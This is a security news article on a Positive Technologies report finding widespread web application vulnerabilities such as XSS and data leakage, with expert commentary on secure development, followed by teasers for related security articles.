A recent study shined a light on an attack vector that is often overlooked: the insecurity of web applications.

According to the report, issued by Positive Technologies, 44 percent of web applications are vulnerable to data leakage and security problems. In other words, threat actors have easy access to the personal customer data those applications handle across a variety of verticals such as banking, e-commerce and communications.

In addition, 48 percent of the applications were found to be vulnerable to unauthorized access, with 17 percent having exploits that could result in a full takeover by a threat actor. But perhaps the most eye-opening finding is that 100 percent of the web applications tested had some sort of vulnerability in general.

Security as an Afterthought

The web app as an attack vector isn’t a new problem, although we may not have realized how severe the vulnerabilities were. And worse, we’ve allowed the problem to linger: Many developers and IT decision-makers don’t take web app security seriously. Mozilla gave 93 percent of websites it observed a failing grade for security against cross-site scripting (XSS), for example. Application security tends to be treated as an afterthought, pushed behind other, more pressing security issues.

The biggest problem, no matter the programming language used, is XSS, according to the report. The authors also pointed to data leakage, fingerprinting and brute-force attacks as common issues across the board.

App Security Lags Despite Increasing Awareness

“Web application security is still poor and, despite increasing awareness of the risks, is still not being prioritized enough in the development process,” said Leigh-Anne Galloway, Positive Technologies cybersecurity resilience lead, as quoted in Infosecurity Magazine. “Most of these issues could have been prevented entirely by implementing secure development practices, including code audits from the start and throughout.”

Why is web app security falling behind? In a blog post for Secure Code Warrior, Pieter Danhieux blamed human behavior, stating that not only do humans behave in ways that introduce vulnerabilities and security threats, but developers aren’t always brought into the security loop.

“How are developers supposed to write secure code if nobody ever teaches them about why it’s important, the consequences of insecure code, and most importantly, how to prevent writing these vulnerabilities in their respective programming frameworks in the first place?” he wrote.

How Cybercriminals Exploit Web Applications to Spread Malware

The Postitive Technologies report cited two primary areas of motivation for cybercriminals to take advantage of web application vulnerabilities. The first is to use apps to infect and spread malware throughout enterprise networks.

“This method was used to spread the Bad Rabbit ransomware: attackers compromised web applications belonging to media outlets and masked malware as an Adobe Flash Player update installer,” the report explained.

In another case, an attacker exploited a vulnerability to disseminate phishing emails targeting bank employees.

Some threat don’t even involve direct attacks against web apps; cybercriminals can use applications in various ways to launch malware attacks. The moment your website or web application is compromised — no matter the method — your organization’s reputation takes a hit, which can lead to financial loss.

Data Theft in a Regulated World

The report also cited data theft as a key motivation for targeting web applications. Data leakage is a problem in any situation, be it customer data or corporate intellectual property. However, the stakes of stolen data have been raised in a post-General Data Protection Regulation (GDPR) and a pre-California Consumer Privacy Act (CCPA) world.

As more states decide to step up measures to protect customer data, any type of data loss can create extraordinary headaches for company leaders. Loss of data can cost an organization hundreds of thousands to millions of dollars in fines, according to data compiled by TermsFeed. At the same time, as more effort is put into data protection, stolen data will become more valuable on the dark web, encouraging threat actors to improve their targeting and attack styles.

How Can Companies Protect Web Applications?

Data privacy regulations require most companies to improve their web application security capabilities. IT leaders can start by building security measures directly into the app’s design as a way to put consumer security and privacy front and center.

“For application security, this means that security and privacy need to be thought about in the planning stages of the Software Development Life Cycle (SDLC),” cybersecurity expert Amit Ashbel wrote for ITProPortal. “Unfortunately, this is not currently the case with many organizations so this will be a large task for the industry.”

Built-in security and privacy measures are crucial. Web app developers should also implement a web application firewall, bolster password management, deploy mobile application management features and install security plugins where available.

As the Positive Technologies report pointed out, it is clear that security issues in web applications aren’t getting the attention they require, because their annual studies are finding the same mistakes and concerns repeating themselves. Lax security may have been overlooked in the past, but as privacy regulations and their consequences gain traction, application vulnerabilities and data leakage can cost your organization more than just a light fine and a slap on the wrist.

Read the IBM e-guide: 5 Steps to Achieve Risk-based Application Security Management

More from Application Security

Gozi strikes again, targeting banks, cryptocurrency and more

3 min read - In the world of cybercrime, malware plays a prominent role. One such malware, Gozi, emerged in 2006 as Gozi CRM, also known as CRM or Papras. Initially offered as a crime-as-a-service (CaaS) platform called 76Service, Gozi quickly gained notoriety for its advanced capabilities. Over time, Gozi underwent a significant transformation and became associated with other malware strains, such as Ursnif (Snifula) and Vawtrak/Neverquest. Now, in a recent campaign, Gozi has set its sights on banks, financial services and cryptocurrency platforms,…

Vulnerability management, its impact and threat modeling methodologies

7 min read - Vulnerability management is a security practice designed to avoid events that could potentially harm an organization. It is a regular ongoing process that identifies, assesses, and manages vulnerabilities across all the components of an IT ecosystem. Cybersecurity is one of the major priorities many organizations struggle to stay on top of. There is a huge increase in the number of cyberattacks carried out by cybercriminals to steal valuable information from businesses. Hence to encounter these attacks, organizations are now focusing…

X-Force releases detection & response framework for managed file transfer software

5 min read - How AI can help defenders scale detection guidance for enterprise software tools If we look back at mass exploitation events that shook the security industry like Log4j, Atlassian, and Microsoft Exchange when these solutions were actively being exploited by attackers, the exploits may have been associated with a different CVE, but the detection and response guidance being released by the various security vendors had many similarities (e.g., Log4shell vs. Log4j2 vs. MOVEit vs. Spring4Shell vs. Microsoft Exchange vs. ProxyShell vs.…

Unmasking hypnotized AI: The hidden risks of large language models

11 min read - The emergence of Large Language Models (LLMs) is redefining how cybersecurity teams and cybercriminals operate. As security teams leverage the capabilities of generative AI to bring more simplicity and speed into their operations, it's important we recognize that cybercriminals are seeking the same benefits. LLMs are a new type of attack surface poised to make certain types of attacks easier, more cost-effective, and even more persistent. In a bid to explore security risks posed by these innovations, we attempted to…